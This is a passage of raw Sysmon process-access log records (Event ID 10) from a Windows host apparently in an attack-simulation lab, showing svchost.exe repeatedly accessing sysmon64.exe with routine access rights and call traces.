07:53:24.358","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.360\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.360","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 